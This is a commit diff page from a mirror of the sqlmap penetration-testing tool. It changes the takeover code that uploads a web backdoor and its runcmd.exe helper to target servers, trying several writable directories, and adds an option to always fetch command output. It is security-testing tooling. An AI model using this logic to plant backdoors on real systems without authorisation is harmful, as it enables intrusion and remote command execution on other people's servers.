sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-02-03 05:04:11 +03:00
Code Issues Packages Projects Releases Wiki Activity

more feature updates

Browse Source
This commit is contained in:
Miroslav Stampar 2010-02-25 11:40:49 +00:00
parent 15d1fcbb7f
commit b558712a47
2 changed files with 27 additions and 18 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

13
lib/takeover/abstraction.py
View File

@ -41,6 +41,7 @@ class Abstraction(Web, UDF, xp_cmdshell):
def __init__(self):
self.envInitialized = False
self.alwaysRetrieveCmdOutput = False
UDF.__init__(self)
Web.__init__(self)
@ -77,11 +78,15 @@ class Abstraction(Web, UDF, xp_cmdshell):
def runCmd(self, cmd):
getOutput = None
message = "do you want to retrieve the command standard "
message += "output? [Y/n] "
getOutput = readInput(message, default="Y")
if not self.alwaysRetrieveCmdOutput:
message = "do you want to retrieve the command standard "
message += "output? [Y/n/a] "
getOutput = readInput(message, default="Y")
if getOutput in ("a", "A"):
self.alwaysRetrieveCmdOutput = True
if not getOutput or getOutput in ("y", "Y"):
if not getOutput or getOutput in ("y", "Y") or self.alwaysRetrieveCmdOutput:
output = self.evalCmd(cmd)
if output:

32
lib/takeover/web.py
View File

@ -169,7 +169,7 @@ class Web:
backdoorName = "tmpb%s.%s" % (randomStr(4), self.webApi)
backdoorStream = decloakToNamedTemporaryFile(os.path.join(paths.SQLMAP_SHELL_PATH, "backdoor.%s_" % self.webApi), backdoorName)
backdoorContent = backdoorStream.read()
originalBackdoorContent = backdoorContent = backdoorStream.read()
uploaderName = "tmpu%s.%s" % (randomStr(4), self.webApi)
uploaderContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "uploader.%s_" % self.webApi))
@ -200,20 +200,24 @@ class Web:
logger.info(infoMsg)
if self.webApi == "asp":
scriptsDirectory = "Scripts"
runcmdName = "tmpe%s.exe" % randomStr(4)
runcmdStream = decloakToNamedTemporaryFile(os.path.join(paths.SQLMAP_SHELL_PATH, 'runcmd.exe_'), runcmdName)
scriptsDirectory = "Scripts"
backdoorDirectory = "%s..\%s" % (posixToNtSlashes(directory), scriptsDirectory)
backdoorContent = backdoorContent.replace("WRITABLE_DIR", backdoorDirectory).replace("RUNCMD_EXE", runcmdName)
backdoorStream.file.truncate()
backdoorStream.read()
backdoorStream.seek(0)
backdoorStream.write(backdoorContent)
if self.__webFileStreamUpload(backdoorStream, backdoorName, backdoorDirectory):
self.__webFileStreamUpload(runcmdStream, runcmdName, backdoorDirectory)
self.webBackdoorUrl = "%s/%s/%s" % (self.webBaseUrl.rstrip('/'), scriptsDirectory, backdoorName)
self.webDirectory = directory
else:
backdoorUploaded = False
for backdoorDirectoryFormat in ("%s.\%s", "%s..\%s", "%s..\..\%s"):
backdoorDirectory = backdoorDirectoryFormat % (posixToNtSlashes(directory), scriptsDirectory)
backdoorContent = originalBackdoorContent.replace("WRITABLE_DIR", backdoorDirectory).replace("RUNCMD_EXE", runcmdName)
backdoorStream.file.truncate()
backdoorStream.read()
backdoorStream.seek(0)
backdoorStream.write(backdoorContent)
if self.__webFileStreamUpload(backdoorStream, backdoorName, backdoorDirectory):
self.__webFileStreamUpload(runcmdStream, runcmdName, backdoorDirectory)
self.webBackdoorUrl = "%s/%s/%s" % (self.webBaseUrl.rstrip('/'), scriptsDirectory, backdoorName)
self.webDirectory = backdoorDirectory
backdoorUploaded = True
break
if not backdoorUploaded:
continue
elif not self.__webFileStreamUpload(backdoorStream, backdoorName, posixToNtSlashes(directory) if kb.os == "Windows" else directory):
warnMsg = "backdoor hasn't been successfully uploaded "
@ -231,7 +235,7 @@ class Web:
self.webDirectory = directory
infoMsg = "the backdoor has probably been successfully "
infoMsg += "uploaded on '%s', go with your browser " % directory
infoMsg += "uploaded on '%s', go with your browser " % self.webDirectory
infoMsg += "to '%s' and enjoy it!" % self.webBackdoorUrl
logger.info(infoMsg)